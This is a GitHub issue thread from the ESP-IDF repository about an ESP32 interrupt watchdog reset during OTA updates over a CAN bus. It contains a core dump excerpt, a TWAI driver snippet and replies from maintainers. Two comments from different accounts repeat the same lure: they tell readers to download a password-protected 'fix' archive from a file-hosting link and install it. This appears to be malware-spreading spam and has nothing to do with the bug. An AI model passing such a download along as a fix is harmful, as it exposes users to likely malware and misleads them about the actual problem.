espressif/esp-idf #14450: IWDT triggered during OTA

michaelpontillas, 2024-08-27:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

esp-idf-5.1.2

### Espressif SoC revision.

ESP32

### Operating System used.

Windows

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

CMD

### Development Kit.

Custom Board

### Power Supply used.

External 3.3V

### What is the expected behavior?

OTA update must be finished without interruption or reset.

### What is the actual behavior?

Device intermittently resets due to interrupt watchdog when OTA progress reaches 80 -90%.

### Steps to reproduce.

N/A

### Debug Logs.

```plain
==================== ESP32 CORE DUMP START ====================

Crashed task handle: 0x3ffef9a4, name: 'Û_OTAU', GDB name: 'process 1073674660'

================== CURRENT THREAD REGISTERS ===================
exccause 0x47 (CacheError)
excvaddr 0x0
epc1 0x0
epc2 0x0
epc3 0x0
epc4 0x0
epc5 0x0
epc6 0x0
epc7 0x0
eps2 0x0
eps3 0x0
eps4 0x0
eps5 0x0
eps6 0x0
eps7 0x0
pc 0x401eb0d8 0x401eb0d8 <periph_ll_reset>
[... 112 lines cut ...]
Environment:
ESP32
esp-idf v5.1.2
8 devices connected over CAN bus and WiFi

I enabled core dump but most of the time the core dump image is not generated. However, I was able get it once. see below.

It appears that the TWAI peripheral gets reset while the flash is being erased.
The stack dump points to line 221 in the twai.c which is the workaround for the twai errata issue. 

#if defined(CONFIG_TWAI_ERRATA_FIX_RX_FRAME_INVALID) || defined(CONFIG_TWAI_ERRATA_FIX_RX_FIFO_CORRUPT)
if (events & TWAI_HAL_EVENT_NEED_PERIPH_RESET) {
twai_hal_prepare_for_reset(&twai_context);
periph_module_reset(p_twai_obj->module);
twai_hal_recover_from_reset(&twai_context);
p_twai_obj->rx_missed_count += twai_hal_get_reset_lost_rx_cnt(&twai_context);
twai_alert_handler(TWAI_ALERT_PERIPH_RESET, &alert_req);
}
#endif

I think the issue happens when the update reaches 80-90% because some devices are already finish with the ota update and then resets which causes bus error frames although I tried to avoid this by placing the CAN transceiver to Standby before the reset to disconnect it from the bus.

- Was this issue already reported and fix in the later esp-idf versions?

- I'm also interested why the core dump is not generated most of time. I tested by placing an while loop inside the isr to force iwdt and a core dump is generated.

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

wanckl, 2024-10-09:
@michaelpontillas 

one note is, if `TWAI ISR is in IRAM`, it designed for continue work during OTA, if not required, don't need place twai in iram, then it's interrupt will be disabled befor OTA

michaelpontillas, 2024-10-09:
Hi,

Thank you for looking into this.

TWAI ISR needs to be in IRAM because the OTA runs over CAN as well.
Was the IWDT caused by TWAI ISR being in IRAM?

Regards,

Michael

wanckl, 2024-10-10:
@michaelpontillas 
> IWDT caused by TWAI ISR being in IRAM    

no.

then, another may not root but related issue can be https://github.com/espressif/esp-idf/issues/14548#issuecomment-2382455339, you can have a try.

michaelpontillas, 2024-10-10:
@wanckl 

Had a similar issue where bus error frames were reported due to devices resetting i.e after ota update. The root cause was that the TXD line is held low at reset (depends on which pin the TXD is mapped to) while the CAN transceiver stays in normal mode. I fixed the issue by setting the CAN transceiver to standby mode to disable the transmitter.

wanckl, 2025-01-13:
@michaelpontillas 
bus error issue is fixed by 460233e on master, and by c032520 on 5.1

is your issue fixed?

michaelpontillas, 2025-01-13:
Hi,

Not fixed yet.

-Michael